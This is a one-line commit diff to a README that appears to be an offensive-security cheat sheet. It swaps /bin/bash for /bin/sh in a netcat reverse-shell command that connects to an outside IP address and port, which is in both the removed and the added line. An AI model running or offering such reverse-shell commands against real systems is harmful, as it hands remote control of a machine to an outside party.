Update README.md

This commit is contained in:
skyper
2023-10-11 07:19:31 +01:00
committed by GitHub
parent 2df2aed368
commit c72140ec76
+1 -1
View File
@@ -1135,7 +1135,7 @@ Embedded systems do not always have Bash and the */dev/tcp/* trick will not work
On the remote system:
```sh
nc -e /bin/bash -vn 3.13.3.7 1524
nc -e /bin/sh -vn 3.13.3.7 1524
```
Variant if *'-e'* is not supported: